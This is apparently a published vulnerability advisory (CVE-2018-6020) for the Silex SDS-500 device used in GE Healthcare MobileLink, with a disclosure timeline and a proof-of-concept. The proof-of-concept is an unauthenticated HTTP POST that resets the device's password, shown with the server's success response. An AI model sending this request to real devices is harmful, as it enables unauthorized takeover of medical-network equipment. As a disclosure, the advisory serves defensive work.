Incorrect Access Control
- Silex Technology
- GE Healthcare
- Silex SDS-500 (v1.54)
- GE Healthcare MobileLink
The Silex Technology SDS-500 device does not check for authentication when handling certain POST requests to the web interface. This allows an attacker to modify settings without authenticating to the device. The SDS-500 device is integrated into the GE Healthcare MobileLink System.
Silex Technology has confirmed the issue, but indicates that the product is working as designed, and that a secondary password must be configured for the 'update' account to prevent unauthenticated changes to the device configuration. The ‘update’ account is not enabled by default and documentation does not inform the user base of the need to enable this account to protect device configurations.
This vulnerability was found by Eric Evenchick of Atredis Partners
- https://nvd.nist.gov/vuln/detail/CVE-2018-6020
- https://github.com/atredispartners/advisories/blob/master/ATREDIS-2018-0001.md
- https://cwe.mitre.org/data/definitions/287.html
- 2018-01-08: Atredis Partners reaches out to Silex Technology and GE Healthcare
- 2018-01-23: Atredis Partners provides draft advisory to GE Healthcare Product Security
- 2018-02-08: Silex Technology indicates that this behavior is by design and can be mitigated through a secondary password on the 'update' account.
- 2018-03-20: Atredis Partners provides draft advisory to CERT/CC
- 2018-05-04: Atredis Partners plans to publish advisory ATREDIS-2018-0001
When making POST requests to the SDS-500 web interface, the 'access' parameter is not checked. An attacker can craft an attack to modify settings with no knowledge of the device's password. This technique can be used to modify the device's ‘access’ password. The request below uses this vulnerability to set the device password to 'test':
POST /psw_update HTTP/1.1
Host: device
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Connection: Close
access=&prot=&language=0&pswnum=0&psw_new1=test&psw_new2=test&action=Submit
The response from the server indicates that the password has been changed:
HTTP/1.1 200 OK
Connection:close
Date:Thu, 01 Jan 1998 00:00:00 GMT
<BODY><CENTER><FONT SIZE="4">Data updated successfully</FONT></CENTER></BODY></HTML>